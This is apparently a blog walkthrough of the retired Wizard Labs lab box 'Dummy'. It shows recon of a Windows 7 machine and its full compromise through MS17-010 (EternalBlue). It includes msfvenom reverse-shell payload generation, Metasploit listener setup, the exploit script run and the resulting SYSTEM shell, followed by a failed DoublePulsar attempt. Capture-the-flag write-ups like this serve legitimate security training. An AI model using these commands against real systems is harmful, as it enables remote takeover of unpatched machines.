Wizard Labs: Dummy
I had an opportunity to check out Wizard Labs recently. It’s a recently launched service much like HackTheBox. Their user interface isn’t as polished or feature rich as HTB, but they have 16 vulnerable machines online right now to attack. The box called Dummy recently retired from their system, so I can safely give it a walk-through. It’s a bit of bad luck that I looked at this just after doing Legacy, as they were very similar boxes. Seems popular to start a service with a Windows SMB vulnerability. This was a Windows 7 box, vulnerable to MS17-010. I’ll use a different python script, and give the Metasploit exploit a spin and fail.
Box Details
| Name: | wl-dummy  |
|---|---|
| OS: | Windows  |
| Difficulty: | 2/10 |
| Creator: | n4ckhcker |
Recon
nmap
nmap shows the Windows NetBios/SMB ports (TCP 135, 139, 445, and UDP 137), as well as TCP 554. It also identifies the box as Windows 7 SP1:
root@kali# nmap -sT -p- --min-rate 10000 -oA nmap/alltcp 10.1.1.13 10.1.1.13
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-21 13:05 EST
Warning: 10.1.1.13 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.1.1.13
Host is up (0.12s latency).
Not shown: 55261 filtered ports, 10270 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
554/tcp open rtsp
Nmap done: 2 IP addresses (1 host up) scanned in 92.88 seconds
root@kali# nmap -sU -p- --min-rate 10000 -oA nmap/alludp 10.1.1.13
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-21 13:11 EST
Warning: 10.1.1.13 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.1.1.13
Host is up (0.12s latency).
Not shown: 65491 open|filtered ports, 43 closed ports
PORT STATE SERVICE
137/udp open netbios-ns
Nmap done: 1 IP address (1 host up) scanned in 86.32 seconds
root@kali# nmap -sV -sC -p 135,139,445,554 -oA nmap/scripts 10.1.1.13
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-21 13:13 EST
Nmap scan report for 10.1.1.13
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
554/tcp open rtsp?
Service Info: Host: DUMMY; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -42m37s, deviation: 1h09m16s, median: -2m38s
|_nbstat: NetBIOS name: DUMMY, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:8d:a7:77 (VMware)
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Dummy
| NetBIOS computer name: DUMMY\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2019-02-21T20:12:55+02:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-02-21 13:12:55
|_ start_date: 2019-01-18 17:53:04
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 136.06 seconds
SMB
Null Sessions
I first checked to see if I could access any shares with a null session, but smbmap or smbclient agreed I couldn’t:
root@kali# smbmap -H 10.1.1.13
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.1.1.13...
[+] IP: 10.1.1.13:445 Name: 10.1.1.13
Disk Permissions
---- -----------
[!] Access Denied
root@kali# smbclient -N -L //10.1.1.13
Anonymous login successful
Sharename Type Comment
--------- ---- -------
smb1cli_req_writev_submit: called for dialect[SMB2_10] server[10.1.1.13]
Error returning browse list: NT_STATUS_REVISION_MISMATCH
Reconnecting with SMB1 for workgroup listing.
Connection to 10.1.1.13 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available
Vulns
Next I scanned for vulnerabilities, and found MS17-010:
root@kali# nmap --script smb-vuln* -p 445 -oA nmap/smb_vuln 10.1.1.13
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-21 13:16 EST
Nmap scan report for 10.1.1.13
Host is up (0.12s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
Nmap done: 1 IP address (1 host up) scanned in 18.93 seconds
System Shell
AutoBlue
This time, I decided to give the AutoBlue scripts a try. It’s a neat system that walks you through shellcode generation and standing up listeners.
I’ll clone the repo into /opt:
root@kali# git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
Cloning into 'AutoBlue-MS17-010'...
remote: Enumerating objects: 1, done.
remote: Counting objects: 100% (1/1), done.
remote: Total 72 (delta 0), reused 0 (delta 0), pack-reused 71
Unpacking objects: 100% (72/72), done.
Next I’ll prep shellcode, answering the prompts:
root@kali# ./shell_prep.sh
_.-;;-._
'-..-'| || |
'-..-'|_.-;;-._|
'-..-'| || |
'-..-'|_.-''-._|
Eternal Blue Windows Shellcode Compiler
Let's compile them windoos shellcodezzz
Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
Y
LHOST for reverse connection:
10.254.1.47
LPORT you want x64 to listen on:
443
LPORT you want x86 to listen on:
445
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
1
Type 0 to generate a staged payload or 1 to generate a stageless payload
1
Generating x64 cmd shell (stageless)...
msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=10.254.1.47 LPORT=443
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 460 bytes
Saved as: sc_x64_msf.bin
Generating x86 cmd shell (stageless)...
msfvenom -p windows/shell_reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=10.254.1.47 LPORT=445
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Saved as: sc_x86_msf.bin
MERGING SHELLCODE WOOOO!!!
DONE
Next I’ll run the script to prepare the listeners, giving the same port numbers and IP I gave in the previous script. It will start Metasploit and start two listeners:
root@kali# ./listener_prep.sh
__
/,-
||)
\\_, )
`--'
Eternal Blue Metasploit Listener
LHOST for reverse connection:
10.254.1.47
LPORT for x64 reverse connection:
443
LPORT for x86 reverse connection:
445
Enter 0 for meterpreter shell or 1 for regular cmd shell:
1
Type 0 if this is a staged payload or 1 if it is for a stageless payload
1
Starting listener (stageless)...
[ ok ] Starting postgresql (via systemctl): postgresql.service.
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM MMMMMMMMMM
MMMN$ vMMMM
MMMNl MMMMM MMMMM JMMMM
MMMNl MMMMMMMN NMMMMMMM JMMMM
MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMNM MMMMMMM MMMMM jMMMM
MMMNI WMMMM MMMMMMM MMMM# JMMMM
MMMMR ?MMNM MMMMM .dMMMM
MMMMNm `?MMM MMMM` dMMMMM
MMMMMMN ?MM MM? NMMMMMN
MMMMMMMMNe JMMMMMNMMM
MMMMMMMMMMNm, eMMMMMNMMNMM
MMMMNNMNMMMMMNx MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
https://metasploit.com
=[ metasploit v5.0.6-dev ]
+ -- --=[ 1857 exploits - 1055 auxiliary - 327 post ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
[*] Processing config.rc for ERB directives.
resource (config.rc)> use exploit/multi/handler
resource (config.rc)> set PAYLOAD windows/x64/shell_reverse_tcp
PAYLOAD => windows/x64/shell_reverse_tcp
resource (config.rc)> set LHOST 10.254.1.47
LHOST => 10.254.1.47
resource (config.rc)> set LPORT 443
LPORT => 443
resource (config.rc)> set ExitOnSession false
ExitOnSession => false
resource (config.rc)> set EXITFUNC thread
EXITFUNC => thread
resource (config.rc)> exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
resource (config.rc)> set PAYLOAD windows/shell/reverse_tcp
[*] Started reverse TCP handler on 10.254.1.47:443
PAYLOAD => windows/shell/reverse_tcp
resource (config.rc)> set LPORT 445
LPORT => 445
resource (config.rc)> exploit -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Starting persistent handler(s)...
[*] Started reverse TCP handler on 10.254.1.47:445
msf5 exploit(multi/handler) >
Now I just run the exploit from a different window. It worked on the second run:
root@kali# python eternalblue_exploit7.py 10.1.1.13 shellcode/sc_all.bin
shellcode size: 2203
numGroomConn: 13
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done
root@kali# python eternalblue_exploit7.py 10.1.1.13 shellcode/sc_all.bin
shellcode size: 2203
numGroomConn: 13
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done
In Metasploit, I get a callback:
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.1.1.13
[*] Command shell session 1 opened (10.254.1.47:445 -> 10.1.1.13:49173) at 2019-02-21 13:28:21 -0500
msf5 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x86/windows Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation... 10.254.1.47:445 -> 10.1.1.13:49173 (10.1.1.13)
msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
More?
SR<@p f%_փMgٿ?:6Zdx8}}(ks-cx_JwD`c@MWHȱl hp6
The system cannot find the file specified.
C:\Windows\system32>whoami
whoami
nt authority\system
From there I can grab the flags:
C:\Users\Admin\Desktop>type root.txt
68bba2c7...
C:\Users\User\Desktop>type user.txt
3f819f9f...
Metasploit - Fail
I figured I’d show how to do this with Metasploit as well, but that effort led to failure.
Scan
Since I already have it open, I’ll type background into my shell to background the session. Then I’ll search for the exploit:
msf5 exploit(multi/handler) > search ms17-010
Matching Modules
================
Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
auxiliary/admin/smb/ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
auxiliary/scanner/smb/smb_ms17_010 normal Yes MS17-010 SMB RCE Detection
exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
exploit/windows/smb/ms17_010_psexec 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
I’ll give the scanner I run first. I use the scanner and then set the RHOSTS to the target, and run it. It looks vulnerable:
msf5 exploit(multi/handler) > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > options
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target address range or CIDR identifier
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 10.1.1.13
RHOSTS => 10.1.1.13
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 10.1.1.13:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x86 (32-bit)
[*] 10.1.1.13:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Built In
That’s good, and confirms what I already know from AutoBlue. The output from the scan shows this is a x86 system, which is a problem, as the standard Metasploit modules for MS17-010 only target x64 systems.
I can switch to the exploit/windows/ms17_010_eternalblue module, but when I run options and show targets, I’ll see only x64 is supported:
msf5 exploit(windows/smb/ms17_010_eternalblue) > options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf5 exploit(windows/smb/ms17_010_eternalblue) > show targets
Exploit targets:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
Outside Module
There are several tutorials out there (like this one) that show how to load an outside exploit into Metasploit to target x86 machines. To do so, I must load 32-bit Wine. I followed the tutorial, but I was unable to get a session. It would tell me that the backdoor was installed, but it was unable to trigger it:
msf5 exploit(windows/smb/eternalblue_doublepulsar) > run
[*] Started reverse TCP handler on 10.254.1.47:4444
[*] 10.1.1.13:445 - Generating Eternalblue XML data
[*] 10.1.1.13:445 - Generating Doublepulsar XML data
[*] 10.1.1.13:445 - Generating payload DLL for Doublepulsar
[*] 10.1.1.13:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 10.1.1.13:445 - Launching Eternalblue...
[+] 10.1.1.13:445 - Pwned! Eternalblue success!
[*] 10.1.1.13:445 - Launching Doublepulsar...
[+] 10.1.1.13:445 - Remote code executed... 3... 2... 1...
[*] Exploit completed, but no session was created.
On another attempt, it even finds the backdoor, but still returns no shell:
msf5 exploit(windows/smb/eternalblue_doublepulsar) > run
[*] Started reverse TCP handler on 10.254.1.47:4444
[*] 10.1.1.13:445 - Generating Eternalblue XML data
[*] 10.1.1.13:445 - Generating Doublepulsar XML data
[*] 10.1.1.13:445 - Generating payload DLL for Doublepulsar
[*] 10.1.1.13:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 10.1.1.13:445 - Launching Eternalblue...
[+] 10.1.1.13:445 - Backdoor is already installed
[*] 10.1.1.13:445 - Launching Doublepulsar...
[+] 10.1.1.13:445 - Remote code executed... 3... 2... 1...
[*] Exploit completed, but no session was created.
The fact that the exploit recognizes the backdoor tells me that the exploit is working, but that something on my machine isn’t configured correctly. I expected showing Metasploit to be the easier path. At this point, I’d tell you, just use AutoBlue!